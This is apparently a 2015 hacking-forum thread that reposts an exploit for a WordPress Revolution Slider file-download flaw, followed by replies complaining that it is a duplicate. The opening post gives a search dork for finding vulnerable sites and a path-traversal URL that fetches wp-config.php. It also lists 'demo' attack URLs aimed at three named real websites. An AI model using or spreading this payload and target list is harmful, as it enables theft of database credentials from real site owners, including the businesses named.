Aerosol Posted January 27, 2015 Report Share Posted January 27, 2015 [+] Title: Wordpress slider reolusion local file download[+] Date: 2015-01-25[+] Author: JOK3R[+] Vendor Homepage: https://wordpress.org/plugins/patch-for-revolution-slider/[+] Tested on: windows 7 / firefox , kali linux / firefox[+] Vulnerable Files: /plugins/revolution-slider/[+} Dork : "Index of" /wp-content/plugins/revolution-slider/### POC: http://victim/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php### Demo: http://www.bungaburgerbar.com/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.phphttp://www.peanut215.com/peanut/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.phphttp://www.pro-businesscenter.com/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php### Credits:[+] Special Thanks: Sheytan Azzam - Mohamad NOfozi - Root3r - Sina_lizard - Ali Ahmady - iliya Norton - Mr.Moein* - ALIREZA_PROMIS*And All iranian Hacker's And Exploiter's <3[+] iran-cyber.inSource Quote Link to comment Share on other sites More sharing options...
Kalashnikov. Posted January 27, 2015 Report Share Posted January 27, 2015 https://rstforums.com/forum/94729-wordpress-revslider-local-file-disclosure.rst?highlight=revslider???? nu mai ai ce sa copiezi si ai inceput sa faci posturi duplicate? Quote Link to comment Share on other sites More sharing options...
Aerosol Posted January 27, 2015 Author Report Share Posted January 27, 2015 [+] Title: Wordpress slider reolusion local file download[+] Date: 2015-01-25[+] Author: JOK3R[+] Vendor Homepage: https://wordpress.org/plugins/patch-for-revolution-slider/[+] Tested on: windows 7 / firefox , kali linux / firefox[+] Vulnerable Files: /plugins/revolution-slider/[+} Dork : "Index of" /wp-content/plugins/revolution-slider/& # Exploit Title: [Wordpress RevSlider Plugin LFD]# Google Dork: inurl:/admin-ajax.php?action=revslider_show_image# Date: 12/29/14# Exploit Author: FarbodEZRaeL# Vendor Homepage: iranhack.org# Software Link: wordpress.org# Tested on: windows Vezi de treaba. Quote Link to comment Share on other sites More sharing options...
Kalashnikov. Posted January 27, 2015 Report Share Posted January 27, 2015 & Vezi de treaba.e accelasi cacat, de ce il pui de 2 ori ? + Quote Link to comment Share on other sites More sharing options...
Bit-ul Posted January 27, 2015 Report Share Posted January 27, 2015 e accelasi cacat, de ce il pui de 2 ori ? +Arata altfel codul si nu s-a prins Quote Link to comment Share on other sites More sharing options...
Gio33 Posted January 27, 2015 Report Share Posted January 27, 2015 https://rstforums.com/forum/89150-revslider-4-6-security-vulnerability.rst?highlight=revsliderMhm .. 09/2014admin-ajax.php?action=revslider_show_imagevsadmin-ajax.php?action=revolution-slider_show_imageSame shit. Quote Link to comment Share on other sites More sharing options...